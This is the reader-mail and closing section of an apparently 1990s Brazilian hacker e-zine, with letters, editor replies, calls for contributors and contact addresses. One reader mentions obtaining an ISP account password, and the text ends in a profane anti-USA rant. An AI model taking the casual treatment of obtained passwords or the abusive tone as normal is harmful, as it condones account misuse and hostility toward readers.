novamente só estou fazendo o que deveria estar fazendo a muito tempo e acho que a Axur 05 e a CNZ sao tao boas quanto a FW mas muito obrigado. De: anonymous BOSTA BOSTA BOSTA BOSTA BOSTA BOSTA BOSTA .................. Re: Isto é o que um inbecil perfeito conssegue fazer esta droga deste e-mail ocupou 3 megas de disco escrito este nominho longo mas quem quer que seja que enviou valeu e ve se tem mais criatividade da proxima vez. De: alguem Tudo bem? A FW é demais ela faz com que nós possamos ser igual a vc's ou possamos estar lá perto. Espero que vc's enssinem como pegar o IP e sobre o NetBios. Valeu at+. Re:VALEEEEEEEEUUUUUUUUU. Aliás nós temos um texto sobre o xitami lá na page e sobre o Netbios teremos matéria na proxima FW. De: sei lá Blz? Cara eu peguei aquela senha do SOL eu logo eu faço tudo certo mas nao da para navegar. Me ajuda valeu. Re:O cara pode ser problema de configuraçao eu nao vou explicar isto aqui liga para o suporte da Microsoft no Brasil. Neste mes recebi um total de 70 e-mail dos mais variados mas resolvi colocar os cinco primeiros que recebi portanto se vc quer ter seu e-mail publicado mande-o o quanto antes. Alias eu nao costumo publicar o nick da pessoa tao pouco o e-mail dela isto vc's poderam ver ai em cima. Alias parem de perguntar porcaria tipo: Me da seu uin pelo AMOR DE DEUS. Sinto que este e-mail será o inicio de uma saudavel amizade. Espero que assim possamos juntos ser os donos da net. Acho que estou apaixonado por vc. Vamos namorar virtualmente. Me come pelo e-mail. Cacete me poupa eu respondo pessoalmente a TODOS os e-mails que chegam aqui mas deste jeito nao ta dando, inbecilidades e-mail bombas estao completamentes descartados e eu nao respondo-os tal como nem os leio. [hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<> Que seja consumado mais uma vez a FW e que TODAS as matérias aqui contidas sejam apenas de uso educacional. Gostaria de frizar aquela idéia do começo um e-zine com as principais mentes do underground para lipar nosso nome lá fora do nosso tao discriminado hack. Juro que uma vez pelo icq uma garota me perguntou se eu era filho do chefe da tribo pq para ter pc em casa aqui teria de ser o chefe da tribo. Outra vez falaram que eu nao era do Brasil pois aqui nao existe energia eletrica. Ae hlera nosso nome tem que ser mudado pq AQUI É 100% BRASIL. Se vc gostou, nao gostou, odiou, amou, quer nos xingar, ajudar, tem um programa legal, nao tem nada para fazer, tem críticas, sugestoes e-mail em: jocker@angelfire.com A nova Fw estara sempre em: www.geocities.com/ResearchTriangle/Lab/5408/main.html ou e-zine.html Nao esqueça esperamos COLABORADORES. Esperamos por vc's pois este e-zine é para vc's. Pedimos apenas que vc distribua este e-zine para quantos puder pq nao tem graça escrever para tres ou quatro. NO NO NO CONSTITUITION fuck, fuck, fuck, fuck, fuck, fuck, fuck all costituition FUCK WORLD I HATE USA FUCK USA! [hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<>[hacK]<>